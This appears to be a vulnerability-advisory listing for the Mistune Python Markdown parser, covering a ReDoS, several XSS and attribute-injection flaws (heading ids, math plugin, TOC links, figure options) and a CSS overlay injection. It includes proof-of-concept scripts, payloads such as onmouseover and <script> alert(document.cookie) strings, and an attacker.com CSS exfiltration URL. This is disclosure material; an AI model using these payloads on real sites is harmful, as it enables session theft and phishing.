Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | JavaScript execution; attacker can exfiltrate session cookies and any data accessible from the page's origin | | **Integrity** | Arbitrary DOM manipulation, phishing form injection, forced redirects | | **Availability** | Page crash or freeze available as secondary effect | **Risk context:** TOC generation is a rendering step that often happens in a different template layer from the main body render, potentially reviewed separately and trusted implicitly. Vulnerabilities in TOC output are frequently overlooked in code review. Combined with H2, an attacker exploiting this via a single malicious heading simultaneously injects into both the heading element and the TOC anchor. | ||
| CVE-2026-33441 | 0.00 | — | — | May 6, 2026 | Rejected reason: This CVE is a duplicate of another CVE: CVE-2026-33079. |
- risk 0.57cvss —epss 0.00
In versions 3.0.0a1 through 3.2.0 of Mistune, there is a ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` that allows an attacker who can supply Markdown for parsing to cause denial of service. The regular expression used for parsing link titles contains overlapping alternatives that can trigger catastrophic backtracking. In both the double-quoted and single-quoted branches, a backslash followed by punctuation can be matched either as an escaped punctuation sequence or as two ordinary characters, creating an ambiguous pattern inside a repeated group. If an attacker supplies Markdown containing repeated ! sequences with no closing quote, the regex engine explores an exponential number of backtracking paths. This is reachable through normal Markdown parsing of inline links and block link reference definitions. A small crafted input can therefore cause significant CPU consumption and make applications using Mistune unresponsive.
- risk 0.26cvss —epss —
## Summary `HTMLRenderer.heading()` builds the opening `<hN>` tag by string-concatenating the `id` attribute value directly into the HTML — with no call to `escape()`, `safe_entity()`, or any other sanitisation function. A double-quote character `"` in the `id` value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, `src=`, `href=`, etc.) into the heading element. The default TOC hook assigns safe auto-incremented IDs (`toc_1`, `toc_2`, …) that never contain user text. However, the `add_toc_hook()` API accepts a caller-supplied `heading_id` callback. Deriving heading IDs from the heading text itself — to produce human-readable slug anchors like `#installation` or `#getting-started` — is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the `id=` attribute. ## Details **File:** `src/mistune/renderers/html.py` ```python def heading(self, text: str, level: int, **attrs: Any) -> str: tag = "h" + str(level) html = "<" + tag _id = attrs.get("id") if _id: html += ' id="' + _id + '"' # ← _id is never escaped return html + ">" + text + "</" + tag + ">\n" ``` The `text` body (line content) *is* escaped upstream by the inline token renderer, which is why `text` arrives as `"` etc. But `_id` arrives as a raw string directly from whatever the `heading_id` callback returned — no escaping occurs at any point in the pipeline. ## PoC **Step 1 — Establish the baseline (safe default IDs)** The script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom `heading_id` callback). The default hook generates sequential numeric IDs: ```python md_safe = create_markdown(escape=True) add_toc_hook(md_safe) # default: heading_id produces toc_1, toc_2, … bl_src = "## Introduction\n" bl_out, _ = md_safe.parse(bl_src) ``` Output — ID is auto-generated, no user text appears in it: ```html <h2 id="toc_1">Introduction</h2> ``` **Step 2 — Add the realistic trigger: a text-based `heading_id` callback** Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, `mkdocs`, `sphinx`, `jekyll` all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation: ```python def raw_id(token, index): return token.get("text", "") # returns raw heading text as the ID md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ``` **Step 3 — Craft the exploit payload** Construct a heading whose text contains a double-quote followed by an injected attribute: ``` ## foo" onmouseover="alert(document.cookie)" x=" ``` When `raw_id` is called, `token["text"]` is `foo" onmouseover="alert(document.cookie)" x="`. This is passed verbatim to `heading()` as the `id` attribute value. **Step 4 — Observe attribute breakout in the output** ```python ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n' ex_out, _ = md_vuln.parse(ex_src) ``` Actual output: ```html <h2 id="foo" onmouseover="alert(document.cookie)" x="">foo" onmouseover="alert(document.cookie)" x="</h2> ``` Note: the heading **body text** is correctly escaped (`"`), but the **`id=` attribute** is not. A user who moves their mouse over the heading triggers `alert(document.cookie)`. Any JavaScript payload can be substituted. ### Script A verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser. ```python #!/usr/bin/env python3 """H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping.""" import os, html as h from mistune import create_markdown from mistune.toc import add_toc_hook def raw_id(token, index): return token.get("text", "") # --- baseline --- md_safe = create_markdown(escape=True) add_toc_hook(md_safe) bl_file = "baseline_h2.md" bl_src = "## Introduction\n" with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) bl_out, _ = md_safe.parse(bl_src) print(f"[{bl_file}]\n{bl_src}") print("[output — id=toc_1, no user content, safe]") print(bl_out) # --- exploit --- md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ex_file = "exploit_h2.md" ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n' with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) ex_out, _ = md_vuln.parse(ex_src) print(f"[{ex_file}]\n{ex_src}") print("[output — heading_id returns raw text, id= not escaped]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em} """ def case(kind, label, filename, src, out): return f""" <div class="case {kind}"> <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>Output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div> <div class="rendered">{out}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body> <h1>H2 — Heading ID XSS (unescaped id= attribute)</h1> <p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping. Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p> {case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)} {case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h2.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example Usage: ```bash python poc.py ``` Once the script is run, open `report_h2.html` in the browser and observe the behaviour. ## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction | | **Integrity** | DOM manipulation, phishing content injection, forced navigation | | **Availability** | Page freeze or crash available to attacker | **Risk context:** This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's `heading_id` callback without independently sanitising the returned value.
- risk 0.26cvss —epss —
In `src/mistune/directives/image.py`, the `render_figure()` function concatenates `figclass` and `figwidth` options directly into HTML attributes without escaping (lines 152-168). This allows attribute injection and XSS even when `HTMLRenderer(escape=True)` is used, because these values bypass the inline renderer. Other attributes in the same file (src, alt, style) are properly escaped; figclass/figwidth were missed.
- risk 0.26cvss —epss —
## Summary The mistune math plugin renders inline math (`$...$`) and block math (`$$...$$`) by concatenating the raw user-supplied content directly into the HTML output **without any HTML escaping**. This occurs even when the parser is explicitly created with `escape=True`, which is supposed to guarantee that all user-controlled text is sanitised before reaching the DOM. The result is a silent contract violation: a developer who enables `escape=True` reasonably expects complete XSS protection, but the math plugin operates as an independent render path that ignores the renderer's `_escape` flag entirely. ## Details **File:** `src/mistune/plugins/math.py` ```python def render_inline_math(renderer, text): # `text` is raw user input — no escape() call anywhere return r'<span class="math">\(' + text + r"\)</span>" def render_block_math(renderer, text): # same issue for block-level $$...$$ return '<div class="math">$$\n' + text + "\n$$</div>\n" ``` Both functions take `text` directly from the parsed token and concatenate it into the output string. Neither function: - calls `escape(text)` from `mistune.util` - checks `renderer._escape` - calls `safe_entity(text)` or any other sanitisation helper The `escape=True` flag only influences the main `HTMLRenderer` methods (`paragraph`, `heading`, `codespan`, etc.). Plugin render functions registered via `md.renderer.register()` receive the `renderer` instance but have no mechanism that enforces the escape contract - they must opt in manually, and `math.py` does not. ## PoC **Step 1 — Establish the baseline (escape=True works for plain HTML)** The script creates a markdown parser with `escape=True` and the math plugin enabled, then feeds it a raw `<script>` tag that is *not* inside math delimiters: ```python md = create_markdown(escape=True, plugins=["math"]) bl_src = "<script>alert(document.cookie)</script>\n" bl_out = str(md(bl_src)) ``` Expected and actual output — the script tag is correctly escaped: ```html <p><script>alert(document.cookie)</script></p> ``` This confirms `escape=True` is working for the normal render path. **Step 2 — Craft the exploit payload** Wrap the identical `<script>` payload inside inline math delimiters `$...$`. The content is token-extracted as `text` and handed to `render_inline_math()`: ```python ex_src = "$<script>alert(document.cookie)</script>$\n" ex_out = str(md(ex_src)) ``` **Step 3 — Observe the bypass** Actual output — the script tag is emitted raw, unescaped: ```html <p><span class="math">\(<script>alert(document.cookie)</script>\)</span></p> ``` The `<script>` block is live inside the `<span class="math">` wrapper. Any browser that renders this HTML will execute `alert(document.cookie)`. **Step 4 — Block math variant (`$$...$$`)** The same bypass applies to block-level math. Payload: ``` $$ <img src=x onerror="alert(document.cookie)"> $$ ``` Output: ```html <div class="math">$$ <img src=x onerror="alert(document.cookie)"> $$</div> ``` The `onerror` handler fires as soon as the browser tries to load the non-existent image `x`. ### Script A verification script was written to test this issue. It creates a HTML page showing the bypass rendering in the browser. ```python #!/usr/bin/env python3 """H1: Math plugin bypasses escape=True — HTML inside $...$ passes through raw.""" import os, html as h from mistune import create_markdown md = create_markdown(escape=True, plugins=["math"]) # --- baseline --- bl_file = "baseline_h1.md" bl_src = "<script>alert(document.cookie)</script>\n" with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) bl_out = str(md(bl_src)) print(f"[{bl_file}]\n{bl_src}") print("[output — escape=True works normally here]") print(bl_out) # --- exploit --- ex_file = "exploit_h1.md" ex_src = "$<script>alert(document.cookie)</script>$\n" with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) ex_out = str(md(ex_src)) print(f"[{ex_file}]\n{ex_src}") print("[output — escape=True bypassed inside math delimiters]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em} """ def case(kind, label, filename, src, out): return f""" <div class="case {kind}"> <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>Output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ rendered in browser</div> <div class="rendered">{out}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H1 — Math XSS</title><style>{CSS}</style></head><body> <h1>H1 — Math Plugin XSS (escape=True bypass)</h1> <p class="desc">render_inline_math() in plugins/math.py concatenates user content without escape(). The escape=True renderer flag is completely ignored inside $...$ delimiters.</p> {case("baseline", "Same HTML outside $...$ — escape=True works", bl_file, bl_src, bl_out)} {case("exploit", "Same HTML inside $...$ — escape=True bypassed", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h1.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example usage: ```bash python poc.py ``` Once the script is run, open `report_h1.html` in the browser and observe the behaviour. ## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | Attacker can exfiltrate session cookies, auth tokens, and any data visible to the victim's browser session | | **Integrity** | Attacker can mutate page content, inject phishing forms, redirect the user, or perform authenticated actions | | **Availability** | Attacker can crash or freeze the page (denial-of-service to the user) | **Risk amplifier:** This is a *bypass* of an explicit security control. Developers who have audited their application and confirmed `escape=True` is set believe they have XSS protection. This vulnerability silently invalidates that assumption for every math-enabled parser instance, making it likely to be missed in code reviews and security audits.
- CVE-2026-44899May 14, 2026risk 0.00cvss —epss —
## Summary The Image directive plugin validates the `:width:` and `:height:` options with a regex compiled as `_num_re = re.compile(r"^\d+(?:\.\d*)?")`. This pattern is applied via `re.match()` (which anchors only at the **start** of the string, not the end). Any value that begins with one or more digits passes validation, regardless of what follows. When the validated value is not a plain integer, `render_block_image()` inserts it directly into a `style="width:...;"` or `style="height:...;"` attribute. Because the value was accepted by the prefix-only regex, any CSS after the leading digits reaches the `style=` attribute verbatim and without escaping. An attacker can therefore inject an arbitrary chain of CSS properties — including `position:fixed`, `background-color`, `z-index`, `outline`, and `opacity` — using nothing more than a single `:width:` option in a fenced image directive. The resulting element can visually cover the entire browser viewport, enabling full-page phishing overlays and UI redressing attacks. ## Details **File:** `src/mistune/directives/image.py` ```python _num_re = re.compile(r"^\d+(?:\.\d*)?") # no $ anchor — prefix match only def _parse_attrs(options): height = options.get("height") width = options.get("width") if height and _num_re.match(height): # passes if value STARTS with a digit attrs["height"] = height # full value stored, not just digits if width and _num_re.match(width): # same — prefix-only check attrs["width"] = width ``` And in `render_block_image()`: ```python if width: if width.isdigit(): img += ' width="' + width + '"' # safe: integer → HTML attribute else: style += "width:" + width + ";" # UNSAFE: non-integer → raw style value ``` The `isdigit()` branch correctly uses an HTML attribute for plain integers. The `else` branch assumes that anything that passed `_num_re.match()` is a safe CSS length like `100px` or `50%`. However, because the regex is prefix-only, `100vw;height:100vh;position:fixed;...` also passes, and the entire string lands in `style=` unmodified. ## PoC **Step 1 — Establish the baseline (safe plain-integer dimensions)** The script creates a parser with `escape=True`, `FencedDirective`, and the `Image` plugin. A safe image directive is rendered with integer `width` and `height`: ```python md = create_markdown(escape=True, plugins=[FencedDirective([Image()])]) bl_src = ( "```{image} photo.jpg\n" ":width: 400\n" ":height: 300\n" ":alt: safe image\n" "```\n" ) bl_out = str(md(bl_src)) ``` Expected and actual output — clean `width=` and `height=` HTML attributes, no `style=`: ```html <div class="block-image"><img src="photo.jpg" alt="safe image" width="400" height="300" /></div> ``` **Step 2 — Understand why non-integer widths go into `style=`** When `width` is not a plain integer (e.g., `100px`), `width.isdigit()` returns `False`, so the render path falls through to `style += "width:" + width + ";"`. This is the intended mechanism for CSS-unit dimensions. The flaw is that `_num_re.match()` lets far more than CSS units through. **Step 3 — Craft the exploit payload** Provide a `:width:` value that begins with a valid number (satisfying `_num_re.match()`) but appends an entire CSS attack chain after it: ``` :width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93 ``` - `100vw` — starts with `1`, passes `_num_re.match()`; also sets the width to full viewport width - `;height:100vh` — overrides height to full viewport height - `;position:fixed` — lifts element out of document flow, fixed to the browser viewport - `;top:0;left:0` — anchors overlay to the top-left corner - `;z-index:9999` — places it above all other page content - `;background-color:#e11d48` — fills the overlay with vivid crimson - `;outline:8px solid #facc15` — adds a bright yellow border - `;color:#fff;opacity:.93` — styles the alt-text label in white with near-full opacity Full exploit markdown: ``` ```{image} x.jpg :width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93 :alt: ⚠ CSS INJECTED — click to dismiss ⚠ ``` ``` **Step 4 — Observe the injected `style=` in the output** ```python ex_src = ( "```{image} x.jpg\n" ":width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;" "background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93\n" ":alt: ⚠ CSS INJECTED — click to dismiss ⚠\n" "```\n" ) ex_out = str(md(ex_src)) ``` Actual output: ```html <div class="block-image"><img src="x.jpg" alt="⚠ CSS INJECTED — click to dismiss ⚠" style="width:100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93;" /></div> ``` Every injected CSS property is present in the `style=` attribute. When a browser renders this HTML, the `<img>` element: - expands to fill 100% of the viewport width and height - sits fixed at the top-left corner, scrolling with the viewport - is coloured crimson with a yellow outline - appears above all other page content The result is a complete full-page phishing overlay generated from a single Markdown image directive. ### Script I have built a script that you can use to verify this. It creates a HTML page showing the bypass so that you can see it render in the browser. ```python #!/usr/bin/env python3 """H6: Image directive CSS injection — width/height use prefix-only re.match(). Exploit combines: position:fixed + background-color + outline colour → a full-viewport coloured overlay injected via a single :width: option. """ import os, html as h from mistune import create_markdown from mistune.directives import FencedDirective from mistune.directives.image import Image md = create_markdown(escape=True, plugins=[FencedDirective([Image()])]) # --- baseline --- bl_file = "baseline_h6.md" bl_src = ( "```{image} photo.jpg\n" ":width: 400\n" ":height: 300\n" ":alt: safe image\n" "```\n" ) with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) bl_out = str(md(bl_src)) print(f"[{bl_file}]\n{bl_src}") print("[output — clean width/height attributes, no style injection]") print(bl_out) # --- exploit --- # _num_re.match() is prefix-only (no $ anchor), so anything after the leading # digits is accepted and written verbatim into style="width:<value>;". # This single :width: value smuggles a full CSS attack chain: # position:fixed → overlay sits above the entire page # top/left/width/height → covers 100 % of the viewport # background-color:#e11d48 → vivid crimson fill # outline:8px solid #facc15 → bright yellow border # color:#fff → white alt-text label # z-index:9999 → on top of everything ex_file = "exploit_h6.md" ex_src = ( "```{image} x.jpg\n" ":width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;" "background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93\n" ":alt: ⚠ CSS INJECTED — click to dismiss ⚠\n" "```\n" ) with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) ex_out = str(md(ex_src)) print(f"[{ex_file}]\n{ex_src}") print("[output — colour + background-colour + fixed overlay injected into style=]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .warn{background:#fffbeb;border:1px solid #fbbf24;border-radius:6px;padding:10px 16px; font-size:.85em;color:#92400e;margin:12px 0} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc; box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px; font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px; background:#fff;font-size:.9em;position:relative;overflow:hidden;height:180px} /* scope the live-render sandbox so position:fixed stays inside the box */ .sandbox{position:relative;width:100%;height:100%} .sandbox img{max-width:100%;max-height:100%;object-fit:contain} /* override position:fixed on exploit img to keep it inside the preview box */ .sandbox img[style*="position:fixed"]{position:absolute!important;width:100%!important; height:100%!important;top:0!important;left:0!important} """ def case(kind, label, filename, src, out): header = "BASELINE" if kind == "baseline" else "EXPLOIT" sandbox = f'<div class="sandbox">{out}</div>' return f""" <div class="case {kind}"> <div class="case-header">{header} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>Output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ live render (sandboxed to preview box)</div> <div class="rendered">{sandbox}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H6 — Image CSS Injection</title><style>{CSS}</style></head><body> <h1>H6 — Image Directive CSS Injection</h1> <p class="desc"> <code>_parse_attrs()</code> in <code>directives/image.py</code> validates <code>:width:</code> / <code>:height:</code> with <code>_num_re.match()</code> (prefix-only — no <code>$</code> anchor). Anything after the leading digits is accepted verbatim and written straight into a <code>style=</code> attribute. A single <code>:width:</code> option is sufficient to smuggle an arbitrary CSS chain: <strong>position:fixed · background-color · outline colour · full-viewport overlay</strong>. </p> <div class="warn"> ⚠ The EXPLOIT preview below is sandboxed inside its box. In a real document the crimson overlay would cover the <em>entire browser window</em>. </div> {case("baseline", "Integer dims → clean width/height= attributes, no style=", bl_file, bl_src, bl_out)} {case("exploit", ":width: carries position:fixed + background-color + outline → full-viewport coloured overlay", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h6.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example usage: ```bash python poc.py ``` Once you run the script, open `report_h6.html` in the browser and observe the behaviour. ## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | CSS-based data exfiltration via `background-image: url(https://attacker.com/?leak=...)` is possible in some browser/CSP configurations | | **Integrity** | Full-viewport overlay enables complete UI replacement: phishing login forms, fake alerts, click-jacking, brand impersonation | | **Availability** | The overlay obscures all page content from the user until dismissed or navigated away | **Real-world impact scenario:** An attacker posts a Markdown document to a platform (wiki, issue tracker, documentation site) that renders mistune with the Image directive. Any user who views the page sees a full-screen crimson overlay matching the attacker's design, replacing or concealing the legitimate page content. The overlay can contain a convincing login prompt, survey form, or urgent warning designed to capture credentials.
- CVE-2026-44898May 14, 2026risk 0.00cvss —epss —
## Summary `render_toc_ul()` builds a `<ul>` table-of-contents tree from a list of `(level, id, text)` tuples. Both the `id` value (used as `href="#<id>"`) and the `text` value (used as the visible link label) are inserted into `<a>` tags via a plain Python format string — with no HTML escaping applied to either value. When heading IDs are derived from user-supplied heading text (the standard use-case for readable slug anchors), an attacker can craft a heading whose text breaks out of the `href="#..."` attribute context, injecting arbitrary HTML tags including `<script>` blocks directly into the rendered TOC. This vulnerability is closely related to H2 (unescaped `id=` in `heading()`): the same `heading_id` callback pattern that triggers H2 also populates the `toc_items` list that `render_toc_ul()` consumes, meaning both vulnerabilities fire simultaneously in a typical documentation setup. ## Details **File:** `src/mistune/toc.py` ```python def render_toc_ul(toc): ... for level, k, text in toc: # k = heading id (used verbatim as href fragment) # text = heading text (used verbatim as link label) item = '<a href="#{}">{}</a>'.format(k, text) # Neither k nor text is passed through escape() at any point ``` The `k` and `text` values come directly from the `toc_items` list accumulated during parsing. If `k` contains `"` or `>`, the `href` attribute is broken. If `text` contains `<`, raw tags are injected as the visible link content. ## PoC **Step 1 — Establish the baseline (safe default IDs)** The script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom callback). The default hook assigns sequential numeric IDs that never contain user text: ```python md_safe = create_markdown(escape=True) add_toc_hook(md_safe) bl_src = "# Introduction\n\n## Installation\n" _, state = md_safe.parse(bl_src) bl_out = render_toc_ul(state.env.get("toc_items", [])) ``` Output — clean, safe TOC: ```html <ul> <li><a href="#toc_1">Introduction</a> <ul> <li><a href="#toc_2">Installation</a></li> </ul> </li> </ul> ``` **Step 2 — Enable the vulnerable `heading_id` callback** Register a callback that returns the raw heading text as the ID. This is the standard slug-based anchor pattern used by documentation generators: ```python def raw_id(token, index): return token.get("text", "") md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ``` **Step 3 — Craft the exploit payload** Construct a heading whose text terminates the `href="#..."` attribute and injects a `<script>` block followed by a dangling `<a href="` to absorb the closing `">` that `render_toc_ul` appends: ``` ## x"><script>alert(document.cookie)</script><a href=" ``` When `raw_id` processes this heading, it returns the entire text as the ID: `x"><script>alert(document.cookie)</script><a href="`. **Step 4 — Observe script injection in the TOC output** ```python ex_src = '## x"><script>alert(document.cookie)</script><a href="\n' _, state = md_vuln.parse(ex_src) ex_out = render_toc_ul(state.env.get("toc_items", [])) ``` `render_toc_ul()` formats the malicious ID directly into the `<a href>`: ```python '<a href="#{}">{}</a>'.format(k, text) # becomes: '<a href="#x"><script>alert(document.cookie)</script><a href="">...<a/>' ``` Actual output: ```html <ul> <li><a href="#x"><script>alert(document.cookie)</script><a href="">x"><script>alert(document.cookie)</script><a href="</a></li> </ul> ``` The `<script>` block is live in the document. Note that the anchor *label* (`text`) is escaped correctly by mistune's inline renderer before it reaches `toc_items`, but `k` (the heading ID) is not escaped anywhere. ### Script I have built a script that you can use to verify this. It creates a HTML page showing the bypass so that you can see it render in the browser. ```python #!/usr/bin/env python3 """H4: render_toc_ul() puts raw heading ID into <a href> without escaping.""" import os, html as h from mistune import create_markdown from mistune.toc import add_toc_hook, render_toc_ul def raw_id(token, index): return token.get("text", "") # --- baseline --- md_safe = create_markdown(escape=True) add_toc_hook(md_safe) bl_file = "baseline_h4.md" bl_src = "# Introduction\n\n## Installation\n" with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) _, state = md_safe.parse(bl_src) bl_out = render_toc_ul(state.env.get("toc_items", [])) print(f"[{bl_file}]\n{bl_src}") print("[toc output — safe]") print(bl_out) # --- exploit --- md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ex_file = "exploit_h4.md" ex_src = '## x"><script>alert(document.cookie)</script><a href="\n' with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) _, state = md_vuln.parse(ex_src) ex_out = render_toc_ul(state.env.get("toc_items", [])) print(f"[{ex_file}]\n{ex_src}") print("[toc output — script injected via href breakout]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em} """ def case(kind, label, filename, src, out): return f""" <div class="case {kind}"> <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>TOC output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ rendered in browser</div> <div class="rendered">{out}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H4 — TOC XSS</title><style>{CSS}</style></head><body> <h1>H4 — TOC render_toc_ul() XSS</h1> <p class="desc">render_toc_ul() in toc.py uses '<a href="#{{}}">{{}}</a>'.format(k, text) — neither k (the heading ID) nor text is escaped before insertion.</p> {case("baseline", "Normal headings → sequential IDs → clean TOC links", bl_file, bl_src, bl_out)} {case("exploit", "Malicious heading 